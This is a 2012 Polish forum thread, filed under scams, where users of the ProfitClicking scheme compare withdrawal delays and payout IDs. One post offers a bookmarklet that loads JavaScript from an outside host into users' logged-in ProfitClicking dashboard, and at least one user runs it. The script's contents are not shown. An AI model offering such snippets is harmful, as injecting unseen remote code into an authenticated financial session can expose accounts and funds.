Witaj gościu! Zaloguj się lub Zarejestruj aby móc korzystać ze wszystkich funkcjonalności jakie oferuje to forum! Rozpocznij zarabianie przez internet, poznaj korzysci pracy w domu! Rejestracja i korzystanie z forum jest całkowicie darmowe!
Praca w domu - Dodatkowa Praca - Zarabianie przez Internet
ProfitClicking - ProfitClicking.com, nowa odsłona JBP - Wersja do druku

+- Praca w domu - Dodatkowa Praca - Zarabianie przez Internet (https://zarabiam.com)
+-- Dział: Off-Topic (/Forum-Off-Topic-9)
+--- Dział: Oszustwa / Scam (/Forum-Oszustwa-Scam-140)
+---- Dział: ProfitClicking - Just Been Paid (JBP - JSS Tripler) (/Forum-ProfitClicking-Just-Been-Paid-JBP-JSS-Tripler-322)
+---- Wątek: ProfitClicking - ProfitClicking.com, nowa odsłona JBP (/Temat-ProfitClicking-ProfitClicking-com-nowa-odslona-JBP-57760)



RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - tomazzi - 12-10-2012 14:51

(12-10-2012 11:58)dexterjj napisał(a):  nie wspominali jak to jest z tymi terminami wypłat ?? ze 7dni stp a inne 10 ? co dokładnie oznacza ten termin ?? ja już mam zapełnione 4procesory płatnicze w tym miesiącu i np. przy stp czekam już 12dni i pisze tam 1day , w PM czekam 11dni i też pisze 1day

tak to są teoretyczne terminy realizacji wypłat, a praktyczne to trzeba dołożyć i czekać cierpliwie na realizację nic nie poradzisz na to innego jak tylko uzbroić się w cierpliwość


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - Meloman - 12-10-2012 15:31

ID to login tak jakby który wpisujemy z hasłem Smile


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - dexterjj - 12-10-2012 16:00

(12-10-2012 15:31)Meloman napisał(a):  ID to login tak jakby który wpisujemy z hasłem Smile

w takim razie mi się wydaje ze to nie ma nic wspólnego z kolejnością wypłat , tylko raczej kolejność zlecenia czyli " Invoice: xxxxxx-WTxxxxxx " pierwsze xxx to ID czyli login , a kolejne xxx to nr kolejny zlecenia wypłaty
I widoczne to mamy w meilu potwierdzającym zlecenie wypłaty


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - Blues - 12-10-2012 16:01

Bynajmniej nie chodzi mi ID użytkownika i nie jest to też liczba, która znajduje się koło Invoice.
ID wypłaty to całkiem coś innego.

Jak ktoś umie się posługiwać to macie skryptozakładkę do sprawdzenia ID swoich oczekującyh wypłat.

Kod:
javascript:(function(){document.body.appendChild(document.createElement('script'​)).src="http://profitclicking24.info/get_transaction_details.js";})();

Używać po zalogowaniu na PC, najlepiej w Dashboardzie.

Skryptozakładka to krótki kod Javascript, który umieszcza się w zakładkach przeglądarki.
Aby korzystać ze skryptozakładki należy dodać kod do zakładek w swojej przeglądarce (jako adres strony)


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - dexterjj - 12-10-2012 23:48

zadziałało to u mnie jedynie w operze , w IE10 nie ,
i ja mam id wypłat
84xxx
95xxx
132xxx
145xxx
i może po prostu porównamy kto kiedy za które id dostanie wypłatę i będziemy wiedzieć czy to leci kolejno po tych nr Smile


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - Blues - 12-10-2012 23:54

IE facepalm Jerk2
Jak ktoś dostanie nową wypłatę to zazwyczaj jej id jest podawane w tytule w formacie idkonta-idwyplaty
Przynajmniej na LR / Payza, co do reszty to nie wiem.


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - dexterjj - 13-10-2012 00:01

a no jest i w stp , ale mi chodzi tak z ciekawości porównać czy po kolei lecą Smile


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - tomazzi - 13-10-2012 08:12

ja dostałem w nocy na lr z id 278, 111 i 468
także płacą jak chcą


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - dexterjj - 13-10-2012 08:38

ooo to chyba jakies stare wypłaty ze 3 na raz ??


RE: ProfitClicking - ProfitClicking.com, nowa odsłona JBP - tomazzi - 13-10-2012 08:41

zlecane dokładnie w tamten piątek więc po 7 dniach czekania przyszły przelewy